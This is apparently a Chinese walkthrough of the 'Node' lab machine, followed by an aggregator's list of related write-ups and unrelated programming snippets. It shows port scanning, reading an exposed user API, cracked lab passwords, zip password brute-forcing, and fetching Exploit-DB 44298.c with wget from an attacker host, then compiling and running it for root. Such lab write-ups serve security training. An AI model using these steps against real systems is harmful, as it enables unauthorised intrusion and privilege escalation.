沐晗子xuer
沐晗子xuer

靶机渗透(四)Node

靶机Node

 

一、实验环境

二、实验步骤

(一)信息收集

1.查看测试机的IP信息,判断所处网段

2.主机发现(netdiscover)

3.端口扫描(masscan/nmap)

(二)Web渗透

1.浏览web网站(3000端口)

2.查看网页源代码

3.码源审计

4.提权

5.留后门,清痕迹

一、实验环境

1.靶机:Node

2.测试机:Kali

3.帮凶机:Windows 10

4.抓包工具:BurpSuite

二、实验步骤

(一)信息收集

1.查看测试机的IP信息,判断所处网段

靶机渗透(四)Node_第1张图片

2.主机发现(netdiscover)

netdiscover -i eth0 -r 192.168.10../24

靶机渗透(四)Node_第2张图片

3.端口扫描(masscan/nmap)

masscan --rate=10000 --ports 0-65535 192.168.10.148
nmap -sV -T4 -p 22,3000 192.168.10.148

靶机渗透(四)Node_第3张图片

  • 开启了22(ssh服务)、3000(http服务)端口

(二)Web渗透

1.浏览web网站(3000端口)

http://192.168.10.148:3000

靶机渗透(四)Node_第4张图片

靶机渗透(四)Node_第5张图片

靶机渗透(四)Node_第6张图片

  • 目标主机开启的3000端口为http服务,不是默认的80端口

  • 有个登录界面,尝试弱密码,未成功(此处可以使用暴力破解)

  • 未发现有用信息

2.查看网页源代码

a.发现敏感信息路径

靶机渗透(四)Node_第7张图片

b.逐级查看该路径

http://192.168.10.148:3000/api/users/latest
http://192.168.10.148:3000/api/users

靶机渗透(四)Node_第8张图片

靶机渗透(四)Node_第9张图片

  • /api/users/latest路径下,查看到四个非管理员用户

  • /api/users路径下,多了一个管理员用户

c.账号密码解密

靶机渗透(四)Node_第10张图片

靶机渗透(四)Node_第11张图片

靶机渗透(四)Node_第12张图片

  • 普通用户账号:tom(spongebob)、mark(snowflake)

  • rastating密码未破解出来

  • 管理员账号:myP14ceAdm1nAcc0uNT(manchester)

d.登录web网页

靶机渗透(四)Node_第13张图片

靶机渗透(四)Node_第14张图片

  • 使用普通用户账号登录,没有任何有效信息

靶机渗透(四)Node_第15张图片

  • 使用admin身份登录,下载了一个myplace.backup文件(使用base64编码),并将该文件导入测试机(Kali)

3.码源审计

a.使用base64对myplace.backup进行解码

base64 -d myplace.backup > myplace.zip

靶机渗透(四)Node_第16张图片

  • 解码出一个.zip的压缩文件,对其进行解压,发现是一个加密文件,需先对密码进行破解

  • base64详细命令查询:base64 --help

b.猜解myplace.zip密码

fcrackzip -v -b -u -c a -p magicaaaa myplace.zip

靶机渗透(四)Node_第17张图片

  • fcrackzip详细命令查询:fcrackzip -h

  • fcrackzip命令:-v(详细信息)、-b(爆破)、-u(使用解压缩来清除密码错误)、-c(使用字符串)、-p(密码)

  • 密码猜解出来:magicword

c.对myplace.zip文件进行解压缩

unzip myplace.zip

靶机渗透(四)Node_第18张图片

d.查看解压文件内容中的目录

靶机渗透(四)Node_第19张图片

  • app.js为项目入口及程序启动文件(Node.js架构),里面存储着重要配置信息,从该文件中,获取到mongodb的配置信息

  • 发现mongodb的用户:mark(5AYRft73VtFpc84k)

靶机渗透(四)Node_第20张图片

靶机渗透(四)Node_第21张图片

  • 在var/www/myplace/static/assets/js/app/controllers目录下的.is文件与上述在网页源代码中的相同

4.提权

a.使用mongodb账号mark(5AYRft73VtFpc84k)远程目标主机

靶机渗透(四)Node_第22张图片

靶机渗透(四)Node_第23张图片

b.查询服务器版本信息(searchsploit)

searchsploit Ubuntu 16.04

靶机渗透(四)Node_第24张图片

  • 发现该内核版本存在漏洞,可以直接提权

c.将44298.c文件拷贝至靶机

cp /usr/share/exploitdb/exploits/linux/local/44298.c /var/www/html
/etc/init.d/apache2 start
cd /tmp
wget http://192.168.10.149/44298.c

靶机渗透(四)Node_第25张图片

  • 此处使用wget命令方式拷贝文件至靶机,也可使用scp命令(前提是靶机必须开启ssh服务)

  • 由于 /tmp文件的限制小,能够将文件写入,所以将文件上传到靶机的tmp文件下

d.编译执行44298.c文件

gcc 44298.c -o exp
./exp

靶机渗透(四)Node_第26张图片

5.留后门,清痕迹

 

总结:

1.该靶机开启http服务的端口为3000端口(访问网页时需加上端口号)

2.此处再次吹爆网页源代码,可以找到许多有用信息

3.若一串编码字符串最后有两个“=”,则极有可能使用base64编码

4.靶机服务器版本漏洞,很多都是提权的关键

5.Node.js架构中存储着重要配置信息

你可能感兴趣的:(靶机渗透)

  • 【靶机渗透】HACKME: 1 安全狐 靶机渗透安全
    【靶机渗透】HACKME:1本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME:10x01靶机介绍1.详情链接https://www.vulnhub.com/entry/hackme-1,330/发布日期2019年7月18日作者x4bx54难度初学者,简单2.描述'hackme'isabeginnerdifficultylevelbox.Thegoalistogainlimite
  • [VulnHub靶机渗透] Nyx hacker-routing web【精选】VulnHub渗透测试靶场练习平台前端开发语言CTF安全网络vulnhub渗透测试
    博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录前言一、信息收集1、主机探测2、端口扫描3、漏洞扫描nikto漏洞扫描nmap漏洞扫描二、调试测
  • DC-9靶机渗透详细流程 kitha. DC靶机系列渗透测试网络安全web安全web网络安全安全攻防
    信息收集:1.存活扫描:arp-scan-Ieth0-l发现靶机ip:192.168.10.132└─#arp-scan-Ieth0-l192.168.10.100:50:56:c0:00:08(Unknown)192.168.10.200:50:56:e5:b1:08(Unknown)192.168.10.132//靶机00:0c:29:a6:a5:cd(Unknown)192.168.10.2
  • [VulnHub靶机渗透] Misdirection: 1 hacker-routing web【精选】VulnHub渗透测试靶场练习平台安全web安全网络网络安全vulnhub渗透测试测试工具
    博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录前言一、信息收集1、主机探测2、端口扫描3、漏洞扫描nmap漏洞扫描二、渗透测试1、web渗透+
  • [红日靶机渗透] ATK&CK红队评估实战靶场三 hacker-routing 红日靶场【精选】VulnHub渗透测试靶场练习平台weblinux前端vulnhubCTF网络安全红日靶场渗透测试
    博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【ATK&CK红队评估实战靶场】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录一、环境搭建1.靶场下载2.拓扑图3.配置环境二、外网渗透1.信息收集2.目录扫
  • [VulnHub靶机渗透] dpwwn: 1 hacker-routing web【精选】VulnHub渗透测试靶场练习平台linux前端vulnhubCTF网络安全提权漏洞
    博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录前言一、信息收集1、主机探测2、端口扫描3、漏洞扫描nmap扫描nikto扫描二、渗透测试1、目
  • DC-6靶机渗透测试详细教程 啊醒 VulnHub靶场通关教程渗透测试DC-6靶机kalilinux网络安全
    DC-6DC-6下载:https://download.vulnhub.com/dc/DC-6.zip.torrent攻击者kali:192.168.1.11受害者DC-6:192.168.1.10通过arp-scan-l扫描到DC-6的IP地址,如果不确定的可以在虚拟机的网络设置查看DC-6的物理地址使用namp扫描DC-6nmap-sS-A-p-192.168.1.10只有22和80端口访问一
  • DC-5靶机渗透详细步骤 sxmmmmmmm DC靶机服务器网络运维系统安全web安全
    1、扫描局域网存活IP因为是在我们本机,所以我们可以知道靶机的mac地址,根据mac地址来寻找ip实战的时候需要我们仔细的观察2、进行端口扫描nmap-p--sV-O192.168.0.149-p-对所有端口进行扫描-sV把每个端口的详细信息扫出来-O扫描操作系统3、查看网站信息和访问80端口因为我们扫描出来该靶机开启了80端口,所以我们可以进行访问并且查看该网站的信息我们可以知道使用的nginx
  • DC-8靶机渗透详细流程 kitha. DC靶机系列渗透测试web安全网络安全web网络安全
    信息收集:1.存活扫描:arp-scan-Ieth0-l└─#arp-scan-Ieth0-lInterface:eth0,type:EN10MB,MAC:00:0c:29:dd:ee:6a,IPv4:192.168.10.129Startingarp-scan1.10.0with256hosts(https://github.com/royhills/arp-scan)192.168.10.10
  • DC-6靶机渗透详细流程 kitha. DC靶机系列渗透测试网络安全web安全web网络安全
    信息收集:1.存活扫描:由于靶机和kali都是nat的网卡,都在一个网段,我们用arp-scan会快一点:arp-scanarp-scan-Ieth0-l└─#arp-scan-Ieth0-lInterface:eth0,type:EN10MB,MAC:00:0c:29:dd:ee:6a,IPv4:192.168.10.129Startingarp-scan1.10.0with256hosts(h
  • DC-7靶机渗透详细流程 kitha. DC靶机系列渗透测试web安全网络安全web网络安全
    信息收集:1.存活扫描:由于靶机和kali都是nat的网卡,都在一个网段,我们用arp-scan会快一点:arp-scanarp-scan-Ieth0-l└─#arp-scan-Ieth0-lInterface:eth0,type:EN10MB,MAC:00:0c:29:dd:ee:6a,IPv4:192.168.10.129Startingarp-scan1.10.0with256hosts(h
  • Chronos靶机渗透 郑居中3.0 vulvhub靶机chronos红队python渗透安全
    Chronos靶机一.信息收集1.靶机IP地址确认2.目录扫描3.常见漏洞扫描5.web网站探测1.网页2.源代码二.网站渗透1.命令执行2.抓包---burpsuite3.反弹shell三.提权1.node.js原核污染第一个flag2.sudo提权第二个flag一.信息收集1.靶机IP地址确认┌──(root㉿kali)-[/]└─#arp-scan-lInterface:eth0,type:
  • 看完这篇 教你玩转渗透测试靶机Vulnhub——DerpNStink:1 落寞的魚丶 渗透测试#Vulnhub靶机Vulnhub靶机CVE-2021-404提权DerpNStink1
    Vulnhub靶机DerpNStink:1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现:③:漏洞利用:④:反弹shell:⑤:获取数据库账号密码及信息:⑥:John爆破:⑦:FTP登入下载:⑧:SSH私钥登入:⑨:CVE-2021-404漏洞提权:⑩:获取FLAGVulnhub靶机渗透总结:Vulnhub
  • [VulnHub靶机渗透] MHZ_CXF: C1F hacker-routing web【精选】VulnHub渗透测试靶场练习平台网络windows安全测试工具vulnhubssh
    博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录前言一、信息收集1、主机探测2、端口扫描3、漏洞扫描二、渗透测试1、web渗透2、ssh远程登录
  • [VulnHub靶机渗透] WestWild 1.1 hacker-routing 【精选】VulnHub渗透测试靶场练习平台web安全web安全前端网络vulnhub网络安全
    博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录前言一、信息收集1.主机探测2.端口扫描3.漏洞扫描二、渗透测试1.先访问web页面2、smb服
  • DC-1靶机渗透测试详细教程 啊醒 VulnHub靶场通关教程安全web安全渗透测试kaliDC-1
    DC-1DC-1下载:https://download.vulnhub.com/dc/DC-1.zip攻击者kaliIP:192.168.1.9受害者DC-1IP:192.168.1.8将DC-1靶机调成和kali同为桥接模式,因为DC-1的账号和密码还不知道,所以不能查看DC-1的IP地址,那么我们将通过kali来扫描到DC-1的IP地址。1使用命令arp-scan-l列出当前局域网的所有设备,
  • 靶机渗透练习26-Funbox5-Next Level hirak0 靶机渗透练习web安全
    靶机描述靶机地址:https://www.vulnhub.com/entry/funbox-next-level,547/DescriptionLetsseparatethescript-kidsfromscript-teenies.Hint:Thefirstimpressionisnotalwaystherightone!Ifyouneedhints,callmeontwitter:@0815R
  • VulnHub-Lord Of The Root_1.0.1-靶机渗透学习 嗯嗯呐 linuxmysql运维base64ubuntu
    靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/靶机难度:中等(CTF)靶机描述:这是KoocSec为黑客练习准备的另一个Boot2Root挑战。他通过OSCP考试的启发准备了这一过程。它基于伟大的小说改制电影《指环王》的概念。目标:得到root权限&找到flag.txt作者:嗯嗯呐一、信息采集nmap扫描确定靶机IP地址扫描
  • [VulnHub靶机渗透] The Ether: EvilScience (v1.0.1) hacker-routing 【精选】VulnHub渗透测试靶场练习平台android网络笔记安全web安全vulnhub全国职业技能大赛
    博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录前言一、信息收集1.主机探测
  • [VulnHub靶机渗透]:billu_b0x 快速通关 hacker-routing 【精选】VulnHub渗透测试靶场练习平台前端javascripthtmlapachewindows服务器网络
    博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录前言:访问80端口的web页面1.扫描目录
  • [Vulnhub靶机] DriftingBlues: 6 haosha。 Vulnhub靶机安全
    [Vulnhub靶机]DriftingBlues:6靶机渗透思路及方法(个人分享)靶机下载地址:https://download.vulnhub.com/driftingblues/driftingblues6_vh.ova靶机地址:192.168.67.25攻击机地址:192.168.67.3一、信息收集1.使用arp-scan命令扫描网段内存活的主机,以获取靶机ip地址arp-scan-I指定
  • 靶机渗透练习04-driftingblues4 hirak0 靶机渗透练习web安全
    靶机描述靶机地址:https://www.vulnhub.com/entry/driftingblues-4,661/Descriptiongetflagsdifficulty:easyaboutvm:testedandexportedfromvirtualbox.dhcpandnestedvtx/amdvenabled.youcancontactmebyemailfortroubleshooti
  • 看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:2 落寞的魚丶 渗透测试#Vulnhub靶机反弹shellVulnhub靶机python3提权Burp爆破cookiecrunch字典生成
    Vulnhub靶机Momentum:2渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现:③:文件上传漏洞利用:④:反弹Shell:⑤:SSH登入:⑥:sudopython3提权:⑦:获取FLAG:Vulnhub靶机渗透总结:Vulnhub靶机介绍:vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟
  • [Vulnhub靶机] DriftingBlues: 5 haosha。 Vulnhub靶机网络安全
    [Vulnhub靶机]DriftingBlues:5靶机渗透思路及方法(个人分享)靶机下载地址:https://download.vulnhub.com/driftingblues/driftingblues5_vh.ova靶机地址:192.168.67.24攻击机地址:192.168.67.3一、信息收集1.使用arp-scan命令扫描网段内存活的主机,以获取靶机ip地址arp-scan-I指定
  • [Vulnhub靶机] DriftingBlues: 1 haosha。 Vulnhub靶机网络安全
    [Vulnhub靶机]DriftingBlues:1靶机渗透思路及方法(个人分享)靶机下载地址:https://download.vulnhub.com/driftingblues/driftingblues.ova靶机地址:192.168.67.20攻击机地址:192.168.67.3一、信息收集1.使用arp-scan命令扫描网段内存活的主机,以获取靶机ip地址arp-scan-I指定网卡-l
  • [Vulnhub靶机] DriftingBlues: 2 haosha。 Vulnhub靶机网络安全
    [Vulnhub靶机]DriftingBlues:2靶机渗透思路及方法(个人分享)靶机下载地址:https://download.vulnhub.com/driftingblues/driftingblues2.ova靶机地址:192.168.67.21攻击机地址:192.168.67.3一、信息收集1.使用arp-scan命令扫描网段内存活的主机,以获取靶机ip地址arp-scan-I指定网卡-
  • 红日靶场-1 真的学不了一点。。。 红日靶场打靶练习网络安全
    实战|记一次基础的内网Vulnstack靶机渗透一https://mp.weixin.qq.com/s/A3MIuT7RXTIIPNLjF42OTg前言kali一个nat网卡,模拟外网攻击机win7一个nat网卡,一个VMnet1网卡(仅主机模式),模拟web服务器win2003一个VMnet1网卡,模拟内网域成员主机win2008一个VMnet1网卡,模拟内网域控主机拓朴图如下:(win7为VM
  • 靶机渗透练习The Planets:Earth CS_Nevvbie 网络安全安全
    文章目录扫描靶机ip端口扫描详细端口扫描漏洞扫描UDP扫描开始渗透提权三板斧扫描靶机ip本题使用第三种【arp-scan-l】扫描靶机法1:【nmap】扫描器nmap-sn是使用nmap工具执行的命令,它用于进行主机发现,并对目标网络中的主机进行快速扫描。【nmap-sn网段/24】nmap:表示执行nmap命令。-sn:是nmap命令的选项之一,代表进行Ping扫描,也称为“PingSweep”
  • [Vulnhub靶机] DriftingBlues: 7 haosha。 安全
    [Vulnhub靶机]DriftingBlues:7靶机渗透思路及方法(个人分享)靶机下载地址:https://download.vulnhub.com/driftingblues/driftingblues7_vh.ova靶机地址:192.168.67.25攻击机地址:192.168.67.3一、信息收集1.使用arp-scan命令扫描网段内存活的主机,以获取靶机ip地址arp-scan-I指定
  • [Vulnhub靶机] DC-1 haosha。 安全
    [Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)靶机下载地址:https://download.vulnhub.com/dc/DC-1.zip靶机地址:192.168.67.25攻击机地址:192.168.67.3一、信息收集1.使用arp-scan命令扫描网段内存活的主机,以获取靶机ip地址arp-scan-I指定网卡-l2.使用nmap工具扫描靶机开放端口、服务版本以及系统版本,得
  • 基本数据类型和引用类型的初始值 3213213333332132 java基础
    package com.array; /** * @Description 测试初始值 * @author FuJianyong * 2015-1-22上午10:31:53 */ public class ArrayTest { ArrayTest at; String str; byte bt; short s; int i; long
  • 摘抄笔记--《编写高质量代码:改善Java程序的151个建议》 白糖_ 高质量代码
            记得3年前刚到公司,同桌同事见我无事可做就借我看《编写高质量代码:改善Java程序的151个建议》这本书,当时看了几页没上心就没研究了。到上个月在公司偶然看到,于是乎又找来看看,我的天,真是非常多的干货,对于我这种静不下心的人真是帮助莫大呀。           看完整本书,也记了不少笔记
  • 【备忘】Django 常用命令及最佳实践 dongwei_6688 django
    注意:本文基于 Django 1.8.2 版本   生成数据库迁移脚本(python 脚本) python manage.py makemigrations polls  说明:polls 是你的应用名字,运行该命令时需要根据你的应用名字进行调整   查看该次迁移需要执行的 SQL 语句(只查看语句,并不应用到数据库上): python manage.p
  • 阶乘算法之一N! 末尾有多少个零 周凡杨 java算法阶乘面试效率
                                     &n
  • spring注入servlet g21121 Spring注入
    传统的配置方法是无法将bean或属性直接注入到servlet中的,配置代理servlet亦比较麻烦,这里其实有比较简单的方法,其实就是在servlet的init()方法中加入要注入的内容: ServletContext application = getServletContext(); WebApplicationContext wac = WebApplicationContextUtil
  • Jenkins 命令行操作说明文档 510888780 centos
    假设Jenkins的URL为http://22.11.140.38:9080/jenkins/ 基本的格式为 java 基本的格式为 java -jar jenkins-cli.jar [-s JENKINS_URL] command [options][args] 下面具体介绍各个命令的作用及基本使用方法 1. &nb
  • UnicodeBlock检测中文用法 布衣凌宇 UnicodeBlock
    /**  * 判断输入的是汉字  */ public static boolean isChinese(char c) {        Character.UnicodeBlock ub = Character.UnicodeBlock.of(c);    
  • java下实现调用oracle的存储过程和函数 aijuans javaorale
    1.创建表:STOCK_PRICES     2.插入测试数据:     3.建立一个返回游标:  PKG_PUB_UTILS   4.创建和存储过程:P_GET_PRICE     5.创建函数:   6.JAVA调用存储过程返回结果集 JDBCoracle10G_INVO
  • Velocity Toolbox antlove 模板toolboxvelocity
    velocity.VelocityUtil package velocity; import org.apache.velocity.Template; import org.apache.velocity.app.Velocity; import org.apache.velocity.app.VelocityEngine; import org.apache.velocity.c
  • JAVA正则表达式匹配基础 百合不是茶 java正则表达式的匹配
      正则表达式;提高程序的性能,简化代码,提高代码的可读性,简化对字符串的操作   正则表达式的用途; 字符串的匹配 字符串的分割 字符串的查找 字符串的替换       正则表达式的验证语法     [a] //[]表示这个字符只出现一次 ,[a] 表示a只出现一
  • 是否使用EL表达式的配置 bijian1013 jspweb.xmlELEasyTemplate
            今天在开发过程中发现一个细节问题,由于前端采用EasyTemplate模板方法实现数据展示,但老是不能正常显示出来。后来发现竟是EL将我的EasyTemplate的${...}解释执行了,导致我的模板不能正常展示后台数据。         网
  • 精通Oracle10编程SQL(1-3)PLSQL基础 bijian1013 oracle数据库plsql
    --只包含执行部分的PL/SQL块 --set serveroutput off begin dbms_output.put_line('Hello,everyone!'); end; select * from emp; --包含定义部分和执行部分的PL/SQL块 declare v_ename varchar2(5); begin select
  • 【Nginx三】Nginx作为反向代理服务器 bit1129 nginx
    Nginx一个常用的功能是作为代理服务器。代理服务器通常完成如下的功能:   接受客户端请求 将请求转发给被代理的服务器 从被代理的服务器获得响应结果 把响应结果返回给客户端 实例 本文把Nginx配置成一个简单的代理服务器 对于静态的html和图片,直接从Nginx获取 对于动态的页面,例如JSP或者Servlet,Nginx则将请求转发给Res
  • Plugin execution not covered by lifecycle configuration: org.apache.maven.plugin blackproof maven报错
    转:http://stackoverflow.com/questions/6352208/how-to-solve-plugin-execution-not-covered-by-lifecycle-configuration-for-sprin   maven报错: Plugin execution not covered by lifecycle configuration:
  • 发布docker程序到marathon ronin47 docker 发布应用
    1 发布docker程序到marathon 1.1 搭建私有docker registry 1.1.1 安装docker regisry docker pull docker-registry docker run -t -p 5000:5000 docker-registry 下载docker镜像并发布到私有registry docker pull consol/tomcat-8.0
  • java-57-用两个栈实现队列&&用两个队列实现一个栈 bylijinnan java
    import java.util.ArrayList; import java.util.List; import java.util.Stack; /* * Q 57 用两个栈实现队列 */ public class QueueImplementByTwoStacks { private Stack<Integer> stack1; pr
  • Nginx配置性能优化 cfyme nginx
    转载地址:http://blog.csdn.net/xifeijian/article/details/20956605   大多数的Nginx安装指南告诉你如下基础知识——通过apt-get安装,修改这里或那里的几行配置,好了,你已经有了一个Web服务器了。而且,在大多数情况下,一个常规安装的nginx对你的网站来说已经能很好地工作了。然而,如果你真的想挤压出Nginx的性能,你必
  • [JAVA图形图像]JAVA体系需要稳扎稳打,逐步推进图像图形处理技术 comsci java
         对图形图像进行精确处理,需要大量的数学工具,即使是从底层硬件模拟层开始设计,也离不开大量的数学工具包,因为我认为,JAVA语言体系在图形图像处理模块上面的研发工作,需要从开发一些基础的,类似实时数学函数构造器和解析器的软件包入手,而不是急于利用第三方代码工具来实现一个不严格的图形图像处理软件......   &nb
  • MonkeyRunner的使用 dai_lm androidMonkeyRunner
    要使用MonkeyRunner,就要学习使用Python,哎 先抄一段官方doc里的代码 作用是启动一个程序(应该是启动程序默认的Activity),然后按MENU键,并截屏 # Imports the monkeyrunner modules used by this program from com.android.monkeyrunner import MonkeyRun
  • Hadoop-- 海量文件的分布式计算处理方案 datamachine mapreducehadoop分布式计算
    csdn的一个关于hadoop的分布式处理方案,存档。 原帖:http://blog.csdn.net/calvinxiu/article/details/1506112。     Hadoop 是Google MapReduce的一个Java实现。MapReduce是一种简化的分布式编程模式,让程序自动分布到一个由普通机器组成的超大集群上并发执行。就如同ja
  • 以資料庫驗證登入 dcj3sjt126com yii
    以資料庫驗證登入 由於 Yii 內定的原始框架程式, 採用綁定在UserIdentity.php 的 demo 與 admin 帳號密碼:    public function authenticate()    {        $users=array( &nbs
  • github做webhooks:[2]php版本自动触发更新 dcj3sjt126com githubgitwebhooks
    上次已经说过了如何在github控制面板做查看url的返回信息了。这次就到了直接贴钩子代码的时候了。 工具/原料 git github 方法/步骤   在github的setting里面的webhooks里把我们的url地址填进去。   钩子更新的代码如下: error_reportin
  • Eos开发常用表达式 蕃薯耀 Eos开发Eos入门Eos开发常用表达式
    Eos开发常用表达式 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2014年8月18日 15:03:35 星期一     &
  • SpringSecurity3.X--SpEL 表达式 hanqunfeng SpringSecurity
    使用 Spring 表达式语言配置访问控制,要实现这一功能的直接方式是在<http>配置元素上添加 use-expressions 属性:   <http auto-config="true" use-expressions="true"> 这样就会在投票器中自动增加一个投票器:org.springframework
  • Redis vs Memcache IXHONG redis
    1. Redis中,并不是所有的数据都一直存储在内存中的,这是和Memcached相比一个最大的区别。 2. Redis不仅仅支持简单的k/v类型的数据,同时还提供list,set,hash等数据结构的存储。 3. Redis支持数据的备份,即master-slave模式的数据备份。 4. Redis支持数据的持久化,可以将内存中的数据保持在磁盘中,重启的时候可以再次加载进行使用。 Red
  • Python - 装饰器使用过程中的误区解读 kvhur JavaScriptjqueryhtml5css
    大家都知道装饰器是一个很著名的设计模式,经常被用于AOP(面向切面编程)的场景,较为经典的有插入日志,性能测试,事务处理,Web权限校验, Cache等。 原文链接:http://www.gbtags.com/gb/share/5563.htm Python语言本身提供了装饰器语法(@),典型的装饰器实现如下:   @function_wrapper de
  • 架构师之mybatis-----update 带case when 针对多种情况更新 nannan408 case when
    1.前言.    如题. 2. 代码.   <update id="batchUpdate" parameterType="java.util.List"> <foreach collection="list" item="list" index=&
  • Algorithm算法视频教程 栏目记者 Algorithm算法
    课程:Algorithm算法视频教程 百度网盘下载地址: http://pan.baidu.com/s/1qWFjjQW 密码: 2mji 程序写的好不好,还得看算法屌不屌!Algorithm算法博大精深。 一、课程内容: 课时1、算法的基本概念 + Sequential search 课时2、Binary search 课时3、Hash table 课时4、Algor
  • C语言算法之冒泡排序 qiufeihu c算法
    任意输入10个数字由小到大进行排序。 代码: #include <stdio.h> int main() { int i,j,t,a[11]; /*定义变量及数组为基本类型*/ for(i = 1;i < 11;i++){ scanf("%d",&a[i]); /*从键盘中输入10个数*/ } for
  • JSP异常处理 wyzuomumu Webjsp
    1.在可能发生异常的网页中通过指令将HTTP请求转发给另一个专门处理异常的网页中: <%@ page errorPage="errors.jsp"%>   2.在处理异常的网页中做如下声明: errors.jsp: <%@ page isErrorPage="true"%>,这样设置完后就可以在网页中直接访问exc
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他